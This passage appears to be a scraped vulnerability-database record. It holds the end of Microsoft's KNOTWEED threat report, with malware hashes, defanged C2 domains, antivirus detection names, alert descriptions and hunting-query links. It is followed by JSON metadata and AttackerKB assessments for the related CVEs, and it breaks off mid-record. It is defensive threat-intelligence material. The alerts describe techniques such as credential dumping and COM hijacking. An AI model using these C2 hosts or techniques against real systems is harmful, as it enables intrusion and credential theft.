fd6515a71530b8329e2c0104d0866c5c6f87546d4b44cc17bbb03e64663b11fc| SHA-256| Jumplump malware
5d169e083faa73f2920c8593fb95f599dad93d34a6aa2b0f794be978e44c8206| SHA-256| Jumplump malware
7f29b69eb1af1cc6c1998bad980640bfe779525fd5bb775bc36a0ce3789a8bfc| SHA-256| Jumplump malware
02a59fe2c94151a08d75a692b550e66a8738eb47f0001234c600b562bf8c227d| SHA-256| Jumplump malware
7f84bf6a016ca15e654fb5ebc36fd7407cb32c69a0335a32bfc36cb91e36184d| SHA-256| Jumplump malware
afab2e77dc14831f1719e746042063a8ec107de0e9730249d5681d07f598e5ec| SHA-256| Jumplump malware
894138dfeee756e366c65a197b4dbef8816406bc32697fac6621601debe17d53| SHA-256| Jumplump malware
4611340fdade4e36f074f75294194b64dcf2ec0db00f3d958956b4b0d6586431| SHA-256| Jumplump malware
c96ae21b4cf2e28eec222cfe6ca903c4767a068630a73eca58424f9a975c6b7d| SHA-256| Corelump malware
fa30be45c5c5a8f679b42ae85410f6099f66fe2b38eb7aa460bcc022babb41ca| SHA-256| Mex tool
e64bea4032cf2694e85ede1745811e7585d3580821a00ae1b9123bb3d2d442d6| SHA-256| Passlib tool
acrobatrelay[.]com| Domain| C2
finconsult[.]cc| Domain| C2
realmetaldns[.]com| Domain| C2

**NOTE:** These indicators should not be considered exhaustive for this observed activity.

## Detections

### Microsoft Defender Antivirus

Microsoft Defender Antivirus detects the malware tools and implants used by KNOTWEED starting with signature build **1.371.503.0** as the following family names:

 * _Backdoor:O97M/JumplumpDropper_
 * _Trojan:Win32/Jumplump_
 * _Trojan:Win32/Corelump_
 * _HackTool:Win32/Mexlib_
 * _Trojan:Win32/Medcerc_
 * _Behavior:Win32/SuspModuleLoad_

### Microsoft Defender for Endpoint

Microsoft Defender for Endpoint customers may see the following alerts as an indication of a possible attack.
These alerts are not necessarily an indication of KNOTWEED compromise:

 * _COM Hijacking_ - Detects multiple behaviors, including _Jumplump_ malware persistence techniques.
 * _Possible privilege escalation using CTF module_ - Detects a possible privilege escalation behavior associated with CVE-2022-2204; also detects an attempt to perform local privilege escalation by launching an elevated process and loading an untrusted module to perform malicious activities.
 * _KNOTWEED actor activity detected_ - Detects KNOTWEED actor activities.
 * _WDigest configuration change_ - Detects potential retrieval of clear-text passwords from changes to the _UseLogonCredential_ registry key.
 * _Sensitive credential memory read_ - Detects LSASS credential dumping via minidumps.
 * _Suspicious Curl behavior_ - Detects the use of Curl to download KNOTWEED tooling from public file shares.
 * _Suspicious screen capture activity_ - Detects _Corelump_ behavior of capturing screenshots of the compromised system.

## Hunting queries

### Microsoft Sentinel

The following resources are available to Microsoft Sentinel customers to identify the activity outlined in the blog post.

**Microsoft Defender Antivirus detections related to KNOTWEED**

This query identifies occurrences of Microsoft Defender Antivirus detections listed in this blog post:

<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/KNOTWEEDAVDetection.yaml>

**File hash IOCs related to KNOTWEED**

This query identifies matches based on file hash IOCs related to KNOTWEED across a range of common Microsoft Sentinel data sets:

<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/KNOTWEEDFileHashesJuly2022.yaml>

**Domain IOCs related to KNOTWEED**

This query identifies matches based on domain IOCs related to KNOTWEED across a range of common Microsoft Sentinel data sets:

<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/KNOTWEEDC2DomainsJuly2022.yaml>

**COM registry key modified to point to Color Profile folder**

This query identifies modifications to COM registry keys to point to executable files in `C:\Windows\System32\spool\drivers\color\`:

<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/MultipleDataSources/COMRegistryKeyModifiedtoPointtoFileinColorDrivers.yaml>

**PE file dropped in Color Profile folder**

This query looks for PE files being created in the `C:\Windows\System32\spool\drivers\color\` folder:

<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/DeviceFileEvents/PEfiledroppedinColorDriversFolder.yaml>

**Abnormally large JPEG downloaded from new source**

This query looks for downloads of JPEG files from remote sources where the file size is abnormally large and the source is not a common one:

<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/CommonSecurityLog/AbnormallyLargeJPEGFiledDownloadedfromNewSource.yaml>

**Downloading new file using Curl**

This query looks for new files being downloaded using Curl:

<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/MultipleDataSources/DownloadofNewFileUsingCurl.yaml>

**Suspected credential dumping**

This query looks for attackers using comsvcs.dll to dump credentials from memory:

<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/SecurityEvent/SuspectedLSASSDump.yaml>

**Downgrade to plaintext credentials**

This query looks for the registry key being set to enable plaintext credentials:

<https://github.com/Azure/Azure-Sentinel/blob/master/Detections/SecurityEvent/WDigestDowngradeAttack.yaml>

### Microsoft 365 Defender advanced hunting

Microsoft 365 Defender customers can run the following advanced hunting queries to locate IOCs and related malicious activity in their environments.

**Microsoft Defender Antivirus detections related to KNOTWEED**

This query identifies detection of related malware and tools by Microsoft Defender Antivirus:

<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-AVDetections.yaml>

**File hash IOCs related to KNOTWEED**

This query surfaces KNOTWEED file hash IOCs across Microsoft Defender for Endpoint tables:

<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-FileHashIOCsJuly2022.yaml>

**Domain IOCs related to KNOTWEED**

This query identifies matches based on domain IOCs related to KNOTWEED against Microsoft Defender for Endpoint device network connections:

<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-DomainIOCsJuly2022.yaml>

**COM registry key modified to point to Color Profile folder**

This query identifies modifications to COM registry keys to point to executable files in `C:\Windows\System32\spool\drivers\color\`:

<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-COMRegistryKeyModifiedtoPointtoColorProfileFolder.yaml>

**PE file dropped in Color Profile folder**

This query looks for PE files being created in the `C:\Windows\System32\spool\drivers\color\` folder:

<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-PEFileDroppedinColorProfileFolder.yaml>

**Downloading new file using Curl**

This query looks for new files being downloaded using Curl:

<https://github.com/Azure/Azure-Sentinel/blob/master/Hunting%20Queries/Microsoft%20365%20Defender/Campaigns/KNOTWEED/KNOTWEED-DownloadingnewfileusingCurl.yaml>

The post [Untangling KNOTWEED: European private-sector
offensive actor using 0-day exploits](<https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/>) appeared first on [Microsoft Security Blog](<https://www.microsoft.com/security/blog>).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-07-27T14:00:00", "type": "mssecure", "title": "Untangling KNOTWEED: European private-sector offensive actor using 0-day exploits", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28550", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-36948", "CVE-2022-2204", "CVE-2022-22047"], "modified": "2022-07-27T14:00:00", "id": "MSSECURE:85647D37E79AFEF2BFF74B4682648C5E", "href": "https://www.microsoft.com/security/blog/2022/07/27/untangling-knotweed-european-private-sector-offensive-actor-using-0-day-exploits/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "attackerkb": [{"lastseen": "2023-05-27T17:21:24", "description": "Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-31199.\n\n \n**Recent assessments:** \n 
\n**architect00** at June 09, 2021 6:55am UTC reported:\n\nThis vulnerability is abused in an exploitation chain. According to the Microsoft advisory it is abused with [Adobe Acrobat CVE-2021-28550](<https://attackerkb.com/topics/6EI6mBj0hQ/cve-2021-28550>).\n\n**gwillcox-r7** at June 17, 2021 4:19pm UTC reported:\n\nThis vulnerability is abused in an exploitation chain. According to the Microsoft advisory it is abused with [Adobe Acrobat CVE-2021-28550](<https://attackerkb.com/topics/6EI6mBj0hQ/cve-2021-28550>).\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "attackerkb", "title": "CVE-2021-31201", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28550", "CVE-2021-31199", "CVE-2021-31201"], "modified": "2021-06-11T00:00:00", "id": "AKB:50EC30BE-5E8C-4158-8AA0-06397441F8A5", "href": "https://attackerkb.com/topics/DEo4rIL8JT/cve-2021-31201", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T17:21:23", "description": "Microsoft Enhanced 
Cryptographic Provider Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-31201.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at June 17, 2021 4:20pm UTC reported:\n\nNot got much to contribute due to limited public information at this time but I did want to note that the `Confidentiality` and `Integrity` scores for this are oddly listed as `Low`, the `Availability` as `None`, and yet `Scope` is marked as `Changed`. My guess is that this is some sort of sandbox related escape given that if we were able to get higher permissions these scores would be a lot higher.\n\n**architect00** at June 09, 2021 6:57am UTC reported:\n\nNot got much to contribute due to limited public information at this time but I did want to note that the `Confidentiality` and `Integrity` scores for this are oddly listed as `Low`, the `Availability` as `None`, and yet `Scope` is marked as `Changed`. My guess is that this is some sort of sandbox related escape given that if we were able to get higher permissions these scores would be a lot higher.\n\nAssessed Attacker Value: 3 \nAssessed Attacker Value: 3Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T00:00:00", "type": "attackerkb", "title": "CVE-2021-31199", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, 
"vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28550", "CVE-2021-31199", "CVE-2021-31201"], "modified": "2021-06-16T00:00:00", "id": "AKB:DBAEA288-D224-49E1-877D-628DFD1CF161", "href": "https://attackerkb.com/topics/GmE7G3wbbK/cve-2021-31199", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:39:18", "description": "Acrobat Reader DC versions versions 2021.001.20150 (and earlier), 2020.001.30020 (and earlier) and 2017.011.30194 (and earlier) are affected by a Use After Free vulnerability. An unauthenticated attacker could leverage this vulnerability to achieve arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.\n\n \n**Recent assessments:** \n \n**gwillcox-r7** at June 04, 2021 5:25pm UTC reported:\n\nNo real details on this at the moment but according to Adobe\u2019s website at <https://helpx.adobe.com/security/products/acrobat/apsb21-29.html> this is a Use-After-Free bug in Adobe Acrobat that leads to remote code execution when opening a PDF. It was anonymously reported and has been reported to be exploited in the wild in limited targeted attacks against Windows users.\n\nGiven the available information though I would guess that to trigger this vulnerability a user would have to open a PDF containing malicious code in Adobe Acrobat and then the malicious PDF would run some JavaScript or similar to put memory into a stable state such that it would be able to trigger the UAF and gain control of Adobe Acrobat without crashing it.\n\nGiven Adobe Acrobat is popular though the attacker value for this bug is pretty high, though I did deduct a point if only cause an attacker would still need to convince a user to open the PDF. 
I also set the exploitability at medium as UAF bugs are not that easy to exploit, however web browsers and PDF readers often provide JavaScript engines that allow attackers to more easily control the state of memory, which can greatly ease the process of exploit development. However without knowing more info its difficult to gauge the level of exploitation difficulty for this specific exploit.\n\nAssessed Attacker Value: 4 \nAssessed Attacker Value: 4Assessed Attacker Value: 3\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-05-11T00:00:00", "type": "attackerkb", "title": "CVE-2021-28550", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28550"], "modified": "2021-09-16T00:00:00", "id": "AKB:132606CF-7B8C-4EE8-BE1C-308811E7B813", "href": "https://attackerkb.com/topics/6EI6mBj0hQ/cve-2021-28550", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-23T17:21:14", "description": "Windows Update Medic Service Elevation of Privilege Vulnerability\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker 
Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-12T00:00:00", "type": "attackerkb", "title": "CVE-2021-36948", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36948"], "modified": "2021-08-21T00:00:00", "id": "AKB:D92D1688-7724-40C4-AD86-DF44F4611D40", "href": "https://attackerkb.com/topics/aTP6m1u6PE/cve-2021-36948", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-07T15:06:33", "description": "Windows Client Server Run-time Subsystem (CSRSS) Elevation of Privilege Vulnerability\n\n \n**Recent assessments:** \n \nAssessed Attacker Value: 0 \nAssessed Attacker Value: 0Assessed Attacker Value: 0\n", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-05-17T00:00:00", 
"type": "attackerkb", "title": "CVE-2022-22047", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22047"], "modified": "2023-05-17T00:00:00", "id": "AKB:0B6E13D5-84E0-4D3E-BD21-781032FA30ED", "href": "https://attackerkb.com/topics/SzYymWZIy5/cve-2022-22047", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2023-05-27T14:46:55", "description": "Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-31199.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T07:00:00", "type": "mscve", "title": "Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": 
"NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28550", "CVE-2021-31199", "CVE-2021-31201"], "modified": "2021-06-08T07:00:00", "id": "MS:CVE-2021-31201", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31201", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-27T14:46:55", "description": "Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-31201.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2021-06-08T07:00:00", "type": "mscve", "title": "Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-28550", "CVE-2021-31199", "CVE-2021-31201"], "modified": "2021-06-08T07:00:00", "id": "MS:CVE-2021-31199", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-31199", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-05-23T16:35:54", "description": 
"Windows Update Medic Service Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-08-10T07:00:00", "type": "mscve", "title": "Windows Update Medic Service Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-36948"], "modified": "2021-08-10T07:00:00", "id": "MS:CVE-2021-36948", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-36948", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-07T15:19:20", "description": "Windows Client Server Run-time Subsystem (CSRSS) Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-12T07:00:00", "type": "mscve", 
"title": "Windows Client Server Run-time Subsystem (CSRSS) Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-22047"], "modified": "2022-07-12T07:00:00", "id": "MS:CVE-2022-22047", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2022-22047", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2023-05-27T14:42:15", "description": "Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-31201.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T23:15:00", "type": "cve", "title": "CVE-2021-31199", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": 
"LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-31199", "CVE-2021-31201"], "modified": "2022-07-12T17:42:00", "cpe": ["cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_server_2008:r2", "cpe:/o:microsoft:windows_server_2008:-", "cpe:/o:microsoft:windows_server_2012:r2"], "id": "CVE-2021-31199", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-31199", "cvss": {"score": 4.6, "vector": "AV:L/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:-:sp2:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2008:r2:sp1:*:*:*:*:x64:*"]}, {"lastseen": "2023-05-27T14:42:10", "description": "Microsoft Enhanced Cryptographic Provider Elevation of Privilege Vulnerability This CVE ID is unique from CVE-2021-31199.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-08T23:15:00", "type": "cve", "title": "CVE-2021-31201", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 4.6, "vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, 
